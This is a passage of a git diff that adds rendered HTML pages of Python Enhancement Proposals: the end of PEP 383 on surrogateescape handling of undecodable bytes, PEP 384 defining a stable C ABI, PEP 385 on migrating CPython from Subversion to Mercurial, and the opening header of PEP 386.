The C char type is a data type that is commonly used to represent both +character data and bytes. Certain POSIX interfaces are specified and +widely understood as operating on character data, however, the system +call interfaces make no assumption on the encoding of these data, and +pass them on as-is. With Python 3, character strings use a +Unicode-based internal representation, making it difficult to ignore +the encoding of byte strings in the same way that the C interfaces can +ignore the encoding.

+

On the other hand, Microsoft Windows NT has corrected the original +design limitation of Unix, and made it explicit in its system +interfaces that these data (file names, environment variables, command +line arguments) are indeed character data, by providing a +Unicode-based API (keeping a C-char-based one for backwards +compatibility).

+

For Python 3, one proposed solution is to provide two sets of APIs: a +byte-oriented one, and a character-oriented one, where the +character-oriented one would be limited to not being able to represent +all data accurately. Unfortunately, for Windows, the situation would +be exactly the opposite: the byte-oriented interface cannot represent +all data; only the character-oriented API can. As a consequence, +libraries and applications that want to support all user data in a +cross-platform manner have to accept mish-mash of bytes and characters +exactly in the way that caused endless troubles for Python 2.x.

+

With this PEP, a uniform treatment of these data as characters becomes +possible. The uniformity is achieved by using specific encoding +algorithms, meaning that the data can be converted back to bytes on +POSIX systems only if the same encoding is used.

+

Being able to treat such strings uniformly will allow application +writers to abstract from details specific to the operating system, and +reduces the risk of one API failing when the other API would have +worked.

+
+
+

Specification

+

On Windows, Python uses the wide character APIs to access +character-oriented APIs, allowing direct conversion of the +environmental data to Python str objects (PEP 277).

+

On POSIX systems, Python currently applies the locale’s encoding to +convert the byte data to Unicode, failing for characters that cannot +be decoded. With this PEP, non-decodable bytes >= 128 will be +represented as lone surrogate codes U+DC80..U+DCFF. Bytes below +128 will produce exceptions; see the discussion below.

+

To convert non-decodable bytes, a new error handler (PEP 293) +“surrogateescape” is introduced, which produces these surrogates. On +encoding, the error handler converts the surrogate back to the +corresponding byte. This error handler will be used in any API that +receives or produces file names, command line arguments, or +environment variables.

+

The error handler interface is extended to allow the encode error +handler to return byte strings immediately, in addition to returning +Unicode strings which then get encoded again (also see the discussion +below).

+

Byte-oriented interfaces that already exist in Python 3.0 are not +affected by this specification. They are neither enhanced nor +deprecated.

+

External libraries that operate on file names (such as GUI file +choosers) should also encode them according to the PEP.

+
+
+

Discussion

+

This surrogateescape encoding is based on Markus Kuhn’s idea that +he called UTF-8b [3].

+

While providing a uniform API to non-decodable bytes, this interface +has the limitation that chosen representation only “works” if the data +get converted back to bytes with the surrogateescape error handler +also. Encoding the data with the locale’s encoding and the (default) +strict error handler will raise an exception, encoding them with UTF-8 +will produce nonsensical data.

+

Data obtained from other sources may conflict with data produced +by this PEP. Dealing with such conflicts is out of scope of the PEP.

+

This PEP allows the possibility of “smuggling” bytes in character +strings. This would be a security risk if the bytes are +security-critical when interpreted as characters on a target system, +such as path name separators. For this reason, the PEP rejects +smuggling bytes below 128. If the target system uses EBCDIC, such +smuggled bytes may still be a security risk, allowing smuggling of +e.g. square brackets or the backslash. Python currently does not +support EBCDIC, so this should not be a problem in practice. Anybody +porting Python to an EBCDIC system might want to adjust the error +handlers, or come up with other approaches to address the security +risks.

+

Encodings that are not compatible with ASCII are not supported by +this specification; bytes in the ASCII range that fail to decode +will cause an exception. It is widely agreed that such encodings +should not be used as locale charsets.

+

For most applications, we assume that they eventually pass data +received from a system interface back into the same system +interfaces. For example, an application invoking os.listdir() will +likely pass the result strings back into APIs like os.stat() or +open(), which then encodes them back into their original byte +representation. Applications that need to process the original byte +strings can obtain them by encoding the character strings with the +file system encoding, passing “surrogateescape” as the error handler +name. For example, a function that works like os.listdir, except for +accepting and returning bytes, would be written as:

+
def listdir_b(dirname):
+    fse = sys.getfilesystemencoding()
+    dirname = dirname.decode(fse, "surrogateescape")
+    for fn in os.listdir(dirname):
+        # fn is now a str object
+        yield fn.encode(fse, "surrogateescape")
+
+
+

The extension to the encode error handler interface proposed by this +PEP is necessary to implement the ‘surrogateescape’ error handler, +because there are required byte sequences which cannot be generated +from replacement Unicode. However, the encode error handler interface +presently requires replacement Unicode to be provided in lieu of the +non-encodable Unicode from the source string. Then it promptly +encodes that replacement Unicode. In some error handlers, such as the +‘surrogateescape’ proposed here, it is also simpler and more efficient +for the error handler to provide a pre-encoded replacement byte +string, rather than forcing it to calculating Unicode from which the +encoder would create the desired bytes.

+

A few alternative approaches have been proposed:

+
    +
  • create a new string subclass that supports embedded bytes
  • +
  • use different escape schemes, such as escaping with a NUL +character, or mapping to infrequent characters.
  • +
+

Of these proposals, the approach of escaping each byte XX +with the sequence U+0000 U+00XX has the disadvantage that +encoding to UTF-8 will introduce a NUL byte in the UTF-8 +sequence. As a consequence, C libraries may interpret this +as a string termination, even though the string continues. +In particular, the gtk libraries will truncate text in this +case; other libraries may show similar problems.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0383.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0384/index.html b/pep-0384/index.html new file mode 100644 index 00000000000..0b20d5cebc4 --- /dev/null +++ b/pep-0384/index.html @@ -0,0 +1,505 @@ + + + + + + + + PEP 384 – Defining a Stable ABI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 384 – Defining a Stable ABI

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
17-May-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at C API Stability (user docs) and +Changing Python’s C API (development docs).

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Currently, each feature release introduces a new name for the +Python DLL on Windows, and may cause incompatibilities for extension +modules on Unix. This PEP proposes to define a stable set of API +functions which are guaranteed to be available for the lifetime +of Python 3, and which will also remain binary-compatible across +versions. Extension modules and applications embedding Python +can work with different feature releases as long as they restrict +themselves to this stable ABI.

+
+
+

Rationale

+

The primary source of ABI incompatibility are changes to the lay-out +of in-memory structures. For example, the way in which string interning +works, or the data type used to represent the size of an object, have +changed during the life of Python 2.x. As a consequence, extension +modules making direct access to fields of strings, lists, or tuples, +would break if their code is loaded into a newer version of the +interpreter without recompilation: offsets of other fields may have +changed, making the extension modules access the wrong data.

+

In some cases, the incompatibilities only affect internal objects of +the interpreter, such as frame or code objects. For example, the way +line numbers are represented has changed in the 2.x lifetime, as has +the way in which local variables are stored (due to the introduction +of closures). Even though most applications probably never used these +objects, changing them had required to change the PYTHON_API_VERSION.

+

On Linux, changes to the ABI are often not much of a problem: the +system will provide a default Python installation, and many extension +modules are already provided pre-compiled for that version. If additional +modules are needed, or additional Python versions, users can typically +compile them themselves on the system, resulting in modules that use +the right ABI.

+

On Windows, multiple simultaneous installations of different Python +versions are common, and extension modules are compiled by their +authors, not by end users. To reduce the risk of ABI incompatibilities, +Python currently introduces a new DLL name pythonXY.dll for each +feature release, whether or not ABI incompatibilities actually exist.

+

With this PEP, it will be possible to reduce the dependency of binary +extension modules on a specific Python feature release, and applications +embedding Python can be made work with different releases.

+
+
+

Specification

+

The ABI specification falls into two parts: an API specification, +specifying what function (groups) are available for use with the +ABI, and a linkage specification specifying what libraries to link +with. The actual ABI (layout of structures in memory, function +calling conventions) is not specified, but implied by the +compiler. As a recommendation, a specific ABI is recommended for +selected platforms.

+

During evolution of Python, new ABI functions will be added. +Applications using them will then have a requirement on a minimum +version of Python; this PEP provides no mechanism for such +applications to fall back when the Python library is too old.

+
+

Terminology

+

Applications and extension modules that want to use this ABI +are collectively referred to as “applications” from here on.

+
+
+

Header Files and Preprocessor Definitions

+

Applications shall only include the header file Python.h (before +including any system headers), or, optionally, include pyconfig.h, and +then Python.h.

+

During the compilation of applications, the preprocessor macro +Py_LIMITED_API must be defined. Doing so will hide all definitions +that are not part of the ABI.

+
+
+

Structures

+

Only the following structures and structure fields are accessible to +applications:

+
    +
  • PyObject (ob_refcnt, ob_type)
  • +
  • PyVarObject (ob_base, ob_size)
  • +
  • PyMethodDef (ml_name, ml_meth, ml_flags, ml_doc)
  • +
  • PyMemberDef (name, type, offset, flags, doc)
  • +
  • PyGetSetDef (name, get, set, doc, closure)
  • +
  • PyModuleDefBase (ob_base, m_init, m_index, m_copy)
  • +
  • PyModuleDef (m_base, m_name, m_doc, m_size, m_methods, m_traverse, +m_clear, m_free)
  • +
  • PyStructSequence_Field (name, doc)
  • +
  • PyStructSequence_Desc (name, doc, fields, sequence)
  • +
  • PyType_Slot (see below)
  • +
  • PyType_Spec (see below)
  • +
+

The accessor macros to these fields (Py_REFCNT, Py_TYPE, Py_SIZE) +are also available to applications.

+

The following types are available, but opaque (i.e. incomplete):

+
    +
  • PyThreadState
  • +
  • PyInterpreterState
  • +
  • struct _frame
  • +
  • struct symtable
  • +
  • struct _node
  • +
  • PyWeakReference
  • +
  • PyLongObject
  • +
  • PyTypeObject
  • +
+
+
+

Type Objects

+

The structure of type objects is not available to applications; +declaration of “static” type objects is not possible anymore +(for applications using this ABI). +Instead, type objects get created dynamically. To allow an +easy creation of types (in particular, to be able to fill out +function pointers easily), the following structures and functions +are available:

+
typedef struct{
+  int slot;    /* slot id, see below */
+  void *pfunc; /* function pointer */
+} PyType_Slot;
+
+typedef struct{
+  const char* name;
+  int basicsize;
+  int itemsize;
+  unsigned int flags;
+  PyType_Slot *slots; /* terminated by slot==0. */
+} PyType_Spec;
+
+PyObject* PyType_FromSpec(PyType_Spec*);
+
+
+

To specify a slot, a unique slot id must be provided. New Python +versions may introduce new slot ids, but slot ids will never be +recycled. Slots may get deprecated, but continue to be supported +throughout Python 3.x.

+

The slot ids are named like the field names of the structures that +hold the pointers in Python 3.1, with an added Py_ prefix (i.e. +Py_tp_dealloc instead of just tp_dealloc):

+
    +
  • tp_dealloc, tp_getattr, tp_setattr, tp_repr, +tp_hash, tp_call, tp_str, tp_getattro, tp_setattro, +tp_doc, tp_traverse, tp_clear, tp_richcompare, tp_iter, +tp_iternext, tp_methods, tp_base, tp_descr_get, tp_descr_set, +tp_init, tp_alloc, tp_new, tp_is_gc, tp_bases, tp_del
  • +
  • nb_add nb_subtract nb_multiply nb_remainder nb_divmod nb_power +nb_negative nb_positive nb_absolute nb_bool nb_invert nb_lshift +nb_rshift nb_and nb_xor nb_or nb_int nb_float nb_inplace_add +nb_inplace_subtract nb_inplace_multiply nb_inplace_remainder +nb_inplace_power nb_inplace_lshift nb_inplace_rshift nb_inplace_and +nb_inplace_xor nb_inplace_or nb_floor_divide nb_true_divide +nb_inplace_floor_divide nb_inplace_true_divide nb_index
  • +
  • sq_length sq_concat sq_repeat sq_item sq_ass_item +sq_contains sq_inplace_concat sq_inplace_repeat
  • +
  • mp_length mp_subscript mp_ass_subscript
  • +
+

The following fields cannot be set during type definition: +- tp_dict tp_mro tp_cache tp_subclasses tp_weaklist tp_print +- tp_weaklistoffset tp_dictoffset

+
+
+

typedefs

+

In addition to the typedefs for structs listed above, the following +typedefs are available. Their inclusion in the ABI means that the +underlying type must not change on a platform (even though it may +differ across platforms).

+
    +
  • Py_uintptr_t Py_intptr_t Py_ssize_t
  • +
  • unaryfunc binaryfunc ternaryfunc inquiry lenfunc ssizeargfunc +ssizessizeargfunc ssizeobjargproc ssizessizeobjargproc objobjargproc +objobjproc visitproc traverseproc +destructor getattrfunc getattrofunc setattrfunc setattrofunc reprfunc +hashfunc richcmpfunc getiterfunc iternextfunc descrgetfunc +descrsetfunc initproc newfunc allocfunc
  • +
  • PyCFunction PyCFunctionWithKeywords PyNoArgsFunction +PyCapsule_Destructor
  • +
  • getter setter
  • +
  • PyOS_sighandler_t
  • +
  • PyGILState_STATE
  • +
  • Py_UCS4
  • +
+

Most notably, Py_UNICODE is not available as a typedef, +since the same Python version may use different definitions +of it on the same platform (depending on whether it uses narrow +or wide code units). Applications that need to access the contents +of a Unicode string can convert it to wchar_t.

+
+
+

Functions and function-like Macros

+

By default, all functions are available, unless they are excluded +below. +Whether a function is documented or not does not matter.

+

Function-like macros (in particular, field access macros) remain +available to applications, but get replaced by function calls +(unless their definition only refers to features of the ABI, such +as the various _Check macros)

+

ABI function declarations will not change their parameters or return +types. If a change to the signature becomes necessary, a new function +will be introduced. If the new function is source-compatible (e.g. if +just the return type changes), an alias macro may get added to +redirect calls to the new function when the applications is +recompiled.

+

If continued provision of the old function is not possible, it may get +deprecated, then removed, causing +applications that use that function to break.

+
+
+

Excluded Functions

+

All functions starting with _Py are not available to applications. +Also, all functions that expect parameter types that are unavailable +to applications are excluded from the ABI, such as PyAST_FromNode +(which expects a node*).

+

Functions declared in the following header files are not part +of the ABI:

+
    +
  • bytes_methods.h
  • +
  • cellobject.h
  • +
  • classobject.h
  • +
  • code.h
  • +
  • compile.h
  • +
  • datetime.h
  • +
  • dtoa.h
  • +
  • frameobject.h
  • +
  • funcobject.h
  • +
  • genobject.h
  • +
  • longintrepr.h
  • +
  • parsetok.h
  • +
  • pyarena.h
  • +
  • pyatomic.h
  • +
  • pyctype.h
  • +
  • pydebug.h
  • +
  • pytime.h
  • +
  • symtable.h
  • +
  • token.h
  • +
  • ucnhash.h
  • +
+

In addition, functions expecting FILE* are not part of +the ABI, to avoid depending on a specific version of the +Microsoft C runtime DLL on Windows.

+

Module and type initializer and finalizer functions are not available +(PyByteArray_Init, PyOS_FiniInterrupts +and all functions ending in _Fini or _ClearFreeList).

+

Several functions dealing with interpreter implementation +details are not available:

+
    +
  • PyInterpreterState_Head, PyInterpreterState_Next, +PyInterpreterState_ThreadHead, PyThreadState_Next
  • +
  • Py_SubversionRevision, Py_SubversionShortBranch
  • +
+

PyStructSequence_InitType is not available, as it requires +the caller to provide a static type object.

+

Py_FatalError will be moved from pydebug.h into some other +header file (e.g. pyerrors.h).

+

The exact list of functions being available is given +in the Windows module definition file for python3.dll [1].

+
+
+

Global Variables

+

Global variables representing types and exceptions are available +to applications. In addition, selected global variables referenced +in macros (such as Py_True and Py_False) are available.

+

A complete list of global variable definitions is given in the +python3.def file [1]; those declared DATA denote variables.

+
+
+

Other Macros

+

All macros defining symbolic constants are available to applications; +the numeric values will not change.

+

In addition, the following macros are available:

+
    +
  • Py_BEGIN_ALLOW_THREADS, Py_BLOCK_THREADS, Py_UNBLOCK_THREADS, +Py_END_ALLOW_THREADS
  • +
+
+
+

The Buffer Interface

+

The buffer interface (type Py_buffer, type slots bf_getbuffer and +bf_releasebuffer, etc) has been omitted from the ABI, since the stability +of the Py_buffer structure is not clear at this time. Inclusion in the +ABI can be considered in future releases.

+
+
+

Signature Changes

+

A number of functions currently expect a specific struct, even though +callers typically have PyObject* available. These have been changed +to expect PyObject* as the parameter; this will cause warnings in +applications that currently explicitly cast to the parameter type. +These functions are PySlice_GetIndices, PySlice_GetIndicesEx, +PyUnicode_AsWideChar, and PyEval_EvalCode.

+
+
+

Linkage

+

On Windows, applications shall link with python3.dll; an import +library python3.lib will be available. This DLL will redirect all of +its API functions through /export linker options to the full +interpreter DLL, i.e. python3y.dll.

+

On Unix systems, the ABI is typically provided by the python +executable itself. PyModule_Create is changed to pass 3 as the API +version if the extension module was compiled with Py_LIMITED_API; the +version check for the API version will accept either 3 or the current +PYTHON_API_VERSION as conforming. If Python is compiled as a shared +library, it is installed as both libpython3.so, and libpython3.y.so; +applications conforming to this PEP should then link to the former +(extension modules can continue to link with no libpython shared object, +but rather rely on runtime linking). +The ABI version is symbolically available as PYTHON_ABI_VERSION.

+

Also on Unix, the PEP 3149 tag abi<PYTHON_ABI_VERSION> is accepted +in file names of extension modules. No checking is performed that +files named in this way are actually restricted to the limited API, +and no support for building such files will be added to distutils +due to the distutils code freeze.

+
+
+
+

Implementation Strategy

+

This PEP will be implemented in a branch [2], allowing users to check +whether their modules conform to the ABI. To avoid users having to +rewrite their type definitions, a script to convert C source code +containing type definitions will be provided [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0384.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0385/index.html b/pep-0385/index.html new file mode 100644 index 00000000000..961dbcdfa05 --- /dev/null +++ b/pep-0385/index.html @@ -0,0 +1,572 @@ + + + + + + + + PEP 385 – Migrating from Subversion to Mercurial | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 385 – Migrating from Subversion to Mercurial

+
+
Author:
+
Dirkjan Ochtman <dirkjan at ochtman.nl>, +Antoine Pitrou <solipsis at pitrou.net>, +Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
25-May-2009
+
+
+
+
Table of Contents +
+
+

Motivation

+

After having decided to switch to the Mercurial DVCS, the actual +migration still has to be performed. In the case of an important +piece of infrastructure like the version control system for a large, +distributed project like Python, this is a significant effort. This +PEP is an attempt to describe the steps that must be taken for further +discussion. It’s somewhat similar to PEP 347, which discussed the +migration to SVN.

+

To make the most of hg, we would like to make a high-fidelity +conversion, such that (a) as much of the svn metadata as possible is +retained, and (b) all metadata is converted to formats that are common +in Mercurial. This way, tools written for Mercurial can be optimally +used. In order to do this, we want to use the hgsubversion +software to do an initial conversion. This hg extension is focused on +providing high-quality conversion from Subversion to Mercurial for use +in two-way correspondence, meaning it doesn’t throw away as much +available metadata as other solutions.

+

Such a conversion also seems like a good time to reconsider the +contents of the repository and determine if some things are still +valuable. In this spirit, the following sections also propose +discarding some of the older metadata.

+
+
+

Timeline

+

The current schedule for conversion milestones:

+
    +
  • 2011-02-24: availability of a test repo at hg.python.org

    Test commits will be allowed (and encouraged) from all committers to +the Subversion repository. The test repository and all test commits +will be removed once the final conversion is done. The server-side +hooks will be installed for the test repository, in order to test +buildbot, diff-email and whitespace checking integration.

    +
  • +
  • 2011-03-05: final conversion (tentative)

    Commits to the Subversion branches now maintained in Mercurial will +be blocked. Developers should refrain from pushing to the Mercurial +repositories until all infrastructure is ensured to work after their +switch over to the new repository.

    +
  • +
+
+
+

Transition plan

+
+

Branch strategy

+

Mercurial has two basic ways of using branches: cloned branches, where +each branch is kept in a separate repository, and named branches, +where each revision keeps metadata to note on which branch it belongs. +The former makes it easier to distinguish branches, at the expense of +requiring more disk space on the client. The latter makes it a little +easier to switch between branches, but all branch names are a +persistent part of history. [1]

+

Differences between named branches and cloned branches:

+
    +
  • Tags in a different (maintenance) clone aren’t available in the +local clone
  • +
  • Clones with named branches will be larger, since they contain more +data
  • +
+

We propose to use named branches for release branches and adopt cloned +branches for feature branches.

+
+
+

History management

+

In order to minimize the loss of information due to the conversion, we +propose to provide several repositories as a conversion result:

+
    +
  • A repository trimmed to the mainline trunk (and py3k), as well as +past and present maintenance branches – this is called the +“working” repo and is where development continues. This repository has +all the history needed for development work, including annotating +source files with changes back up to 1990 and other common history-digging +operations.

    The default branch in that repo is what is known as py3k in +Subversion, while the Subversion trunk lives on with the branch name +legacy-trunk; however in Mercurial this branch will be closed. +Release branches are named after their major.minor version, e.g. 3.2.

    +
  • +
  • A repository with the full, unedited conversion of the Subversion +repository (actually, its /python subdirectory) – this is called +the “historic” or “archive” repo and will be offered as a read-only +resource. [2]
  • +
  • One more repository per active feature branch; “active” means that +at least one core developer asks for the branch to be provided. Each +such repository will contain both the feature branch and all ancestor +changesets from mainline (coming from trunk and/or py3k in SVN).
  • +
+

Since all branches are present in the historic repo, they can later be +extracted as separate repositories at any time should it prove to be +necessary.

+

The final revision map between SVN revision numbers, Mercurial changesets +and SVN branch names will be made available in a file stored in the Misc +directory. Its format is as following:

+
[...]
+88483 e65daae6cf4499a0863cb7645109a4798c28d83e issue10276-snowleopard
+88484 835cb57abffeceaff0d85c2a3aa0625458dd3e31 py3k
+88485 d880f9d8492f597a030772c7485a34aadb6c4ece release32-maint
+88486 0c431b8c22f5dbeb591414c154acb7890c1809df py3k
+88487 82cda1f21396bbd10db8083ea20146d296cb630b release32-maint
+88488 8174d00d07972d6f109ed57efca8273a4d59302c release27-maint
+[...]
+
+
+
+
+

Converting tags

+

The SVN tags directory contains a lot of old stuff. Some of these are +not, in fact, full tags, but contain only a smaller subset of the +repository. All release tags will be kept; other tags will be +included based on requests from the developer community. We propose +to make the tag naming scheme consistent, in this style: v3.2.1a2.

+
+
+

Author map

+

In order to provide user names the way they are common in hg (in the +‘First Last <user@example.org>’ format), we need an author map to map +cvs and svn user names to real names and their email addresses. We +have a complete version of such a map in the migration tools +repository (not publicly accessible to avoid leaking addresses to +harvesters). The email addresses in it might be out of date; that’s +bound to happen, although it would be nice to try and have as many +people as possible review it for addresses that are out of date. The +current version also still seems to contain some encoding problems.

+
+
+

Generating .hgignore

+

The .hgignore file can be used in Mercurial repositories to help +ignore files that are not eligible for version control. It does this +by employing several possible forms of pattern matching. The current +Python repository already includes a rudimentary .hgignore file to +help with using the hg mirrors.

+

Since the current Python repository already includes a .hgignore file +(for use with hg mirrors), we’ll just use that. Generating full +history of the file was debated but deemed impractical (because it’s +relatively hard with fairly little gain, since ignoring is less +important for older revisions).

+
+
+

Repository size

+

A bare conversion result of the current Python repository weighs 1.9 +GB; although this is smaller than the Subversion repository (2.7 GB) +it is not feasible.

+

The size becomes more manageable by the trimming applied to the +working repository, and by a process called “revlog reordering” that +optimizes the layout of internal Mercurial storage very efficiently.

+

After all optimizations done, the size of the working repository is +around 180 MB on disk. The amount of data transferred over the +network when cloning is estimated to be around 80 MB.

+
+
+

Other repositories

+

There are a number of other projects hosted in svn.python.org’s +“projects” repository. The “peps” directory will be converted along +with the main Python one. Richard Tew has indicated that he’d like the +Stackless repository to also be converted. What other projects in the +svn.python.org repository should be converted?

+

There’s now an initial stab at converting the Jython repository. The +current tip of hgsubversion unfortunately fails at some point. +Pending investigation.

+

Other repositories that would like to converted to Mercurial can +announce themselves to me after the main Python migration is done, and +I’ll take care of their needs.

+
+
+
+

Infrastructure

+
+

hg-ssh

+

Developers should access the repositories through ssh, similar to the +current setup. Public keys can be used to grant people access to a +shared hg@ account. A hgwebdir instance also has been set up at +hg.python.org for easy browsing and read-only access. It is +configured so that developers can trivially start new clones (for +longer-term features that profit from development in a separate +repository).

+

Also, direct creation of public repositories is allowed for core developers, +although it is not yet decided which naming scheme will be enforced:

+
$ hg init ssh://hg@hg.python.org/sandbox/mywork
+repo created, public URL is http://hg.python.org/sandbox/mywork
+
+
+
+
+

Hooks

+

A number of hooks is currently in use. The hg equivalents for these +should be developed and deployed. The following hooks are being used:

+
    +
  • check whitespace: a hook to reject commits in case the whitespace +doesn’t match the rules for the Python codebase. In a changegroup, +only the tip is checked (this allows cleanup commits for changes +pulled from third-party repos). We can also offer a whitespace hook +for use with client-side repositories that people can use; it could +either warn about whitespace issues and/or truncate trailing +whitespace from changed lines.
  • +
  • push mails: Emails will include diffs for each changeset pushed +to the public repository, including the username which pushed the +changesets (this is not necessarily the same as the author recorded +in the changesets).
  • +
  • buildbots: the python.org build master will be notified of each changeset +pushed to the cpython repository, and will trigger an appropriate build +on every build slave for the branch in which the changeset occurs.
  • +
+

The hooks repository contains ports of these server-side hooks to +Mercurial, as well as a couple additional ones:

+
    +
  • check branch heads: a hook to reject pushes which create a new head on +an existing branch. The pusher then has to merge the excess heads +and try pushing again.
  • +
  • check branches: a hook to reject all changesets not on an allowed named +branch. This hook’s whitelist will have to be updated when we want to +create new maintenance branches.
  • +
  • check line endings: a hook, based on the eol extension, to reject all +changesets committing files with the wrong line endings. The commits then +have to be stripped and redone, possibly with the eol extension enabled +on the comitter’s computer.
  • +
+

One additional hook could be beneficial:

+
    +
  • check contributors: in the current setup, all changesets bear the +username of committers, who must have signed the contributor +agreement. We might want to use a hook to check if the committer is +a contributor if we keep a list of registered contributors. Then, +the hook might warn users that push a group of revisions containing +changesets from unknown contributors.
  • +
+
+
+

End-of-line conversions

+

Discussion about the lack of end-of-line conversion support in +Mercurial, which was provided initially by the win32text extension, +led to the development of the new eol extension that supports a +versioned management of line-ending conventions on a file-by-file +basis, akin to Subversion’s svn:eol-style properties. This +information is kept in a versioned file called .hgeol, and such a +file has already been checked into the Subversion repository.

+

A hook also exists on the server side to reject any changeset +introducing inconsistent newline data (see above).

+
+
+

hgwebdir

+

A more or less stock hgwebdir installation should be set up. We might +want to come up with a style to match the Python website.

+

A small WSGI application has been written that can look up +Subversion revisions and redirect to the appropriate hgweb page for +the given changeset, regardless in which repository the converted +revision ended up (since one big Subversion repository is converted +into several Mercurial repositories). It can also look up Mercurial +changesets by their hexadecimal ID.

+
+
+

roundup

+

By pointing Roundup to the URL of the lookup script mentioned above, +links to SVN revisions will continue to work, and links to Mercurial +changesets can be created as well, without having to give repository +and changeset ID.

+
+
+
+

After migration

+
+

Where to get code

+

After migration, the hgwebdir will live at hg.python.org. This is an +accepted standard for many organizations, and an easy parallel to +svn.python.org. The working repo might live at +http://hg.python.org/cpython/, for example, with the archive repo at +http://hg.python.org/cpython-archive/. For write access, developers +will have to use ssh, which could be ssh://hg@hg.python.org/cpython/.

+

code.python.org was also proposed as the hostname. We think that +using the VCS name in the hostname is good because it prevents +confusion: it should be clear that you can’t use svn or bzr for +hg.python.org.

+

hgwebdir can already provide tarballs for every changeset. This +obviates the need for daily snapshots; we can just point users to +tip.tar.gz instead, meaning they will get the latest. If desired, we +could even use buildbot results to point to the last good changeset.

+
+
+

Python-specific documentation

+

hg comes with good built-in documentation (available through hg help) +and a wiki that’s full of useful information and recipes, not to +mention a popular book (readable online).

+

In addition to that, the recently overhauled Python Developer’s +Guide already has a branch with instructions for Mercurial instead +of Subversion; an online build of this branch is also available.

+
+
+

Proposed workflow

+

We propose two workflows for the migration of patches between several +branches.

+

For migration within 2.x or 3.x branches, we propose a patch always +gets committed to the oldest branch where it applies first. Then, the +resulting changeset can be merged using hg merge to all newer branches +within that series (2.x or 3.x). If it does not apply as-is to the +newer branch, hg revert can be used to easily revert to the +new-branch-native head, patch in some alternative version of the patch +(or none, if it’s not applicable), then commit the merge. The premise +here is that all changesets from an older branch within the series are +eventually merged to all newer branches within the series.

+

The upshot is that this provides for the most painless merging +procedure. This means that in the general case, people have to think +about the oldest branch to which the patch should be applied before +actually applying it. Usually, that is one of only two branches: the +latest maintenance branch and the trunk, except for security fixes +applicable to older branches in security-fix-only mode.

+

For merging bug fixes from the 3.x to the 2.7 maintenance branch (2.6 +and 2.5 are in security-fix-only mode and their maintenance will +continue in the Subversion repository), changesets should be +transplanted (not merged) in some other way. The transplant +extension, import/export and bundle/unbundle work equally well here.

+

Choosing this approach allows 3.x not to carry all of the 2.x +history-since-it-was-branched, meaning the clone is not as big and the +merges not as complicated.

+
+
+

The future of Subversion

+

What happens to the Subversion repositories after the migration? +Since the svn server contains a bunch of repositories, not just the +CPython one, it will probably live on for a bit as not every project +may want to migrate or it takes longer for other projects to migrate. +To prevent people from staying behind, we may want to move migrated +projects from the repository to a new, read-only repository with a new +name.

+
+
+

Build identification

+

Python currently provides the sys.subversion tuple to allow Python +code to find out exactly what version of Python it’s running against. +The current version looks something like this:

+
    +
  • (‘CPython’, ‘tags/r262’, ‘71600’)
  • +
  • (‘CPython’, ‘trunk’, ‘73128M’)
  • +
+

Another value is returned from Py_GetBuildInfo() in the C API, and +available to Python code as part of sys.version:

+
    +
  • ‘r262:71600, Jun 2 2009, 09:58:33’
  • +
  • ‘trunk:73128M, Jun 2 2009, 01:24:14’
  • +
+

I propose that the revision identifier will be the short version of +hg’s revision hash, for example ‘dd3ebf81af43’, augmented with ‘+’ +(instead of ‘M’) if the working directory from which it was built was +modified. This mirrors the output of the hg id command, which is +intended for this kind of usage. The sys.subversion value will also +be renamed to sys.mercurial to reflect the change in VCS.

+

For the tag/branch identifier, I propose that hg will check for tags +on the currently checked out revision, use the tag if there is one +(‘tip’ doesn’t count), and uses the branch name otherwise. +sys.subversion becomes

+
    +
  • (‘CPython’, ‘v2.6.2’, ‘dd3ebf81af43’)
  • +
  • (‘CPython’, ‘default’, ‘af694c6a888c+’)
  • +
+

and the build info string becomes

+
    +
  • ‘v2.6.2:dd3ebf81af43, Jun 2 2009, 09:58:33’
  • +
  • ‘default:af694c6a888c+, Jun 2 2009, 01:24:14’
  • +
+

This reflects that the default branch in hg is called ‘default’ +instead of Subversion’s ‘trunk’, and reflects the proposed new tag +format.

+

Mercurial also allows to find out the latest tag and the number of +changesets separating the current changeset from that tag, allowing for +a descriptive version string:

+
$ hg parent --template "{latesttag}+{latesttagdistance}-{node|short}\n"
+v3.2+37-4b5d0d260e72
+$ hg up 2.7
+3316 files updated, 0 files merged, 379 files removed, 0 files unresolved
+$ hg parent --template "{latesttag}+{latesttagdistance}-{node|short}\n"
+v2.7.1+216-9619d21d8198
+
+
+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0385.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0386/index.html b/pep-0386/index.html new file mode 100644 index 00000000000..a02dc9749f3 --- /dev/null +++ b/pep-0386/index.html @@ -0,0 +1,621 @@ + + + + + + + + PEP 386 – Changing the version comparison module in Distutils | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 386 – Changing the version comparison module in Distutils

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-Jun-2009
+
Superseded-By:
+
440
+
+
+
+
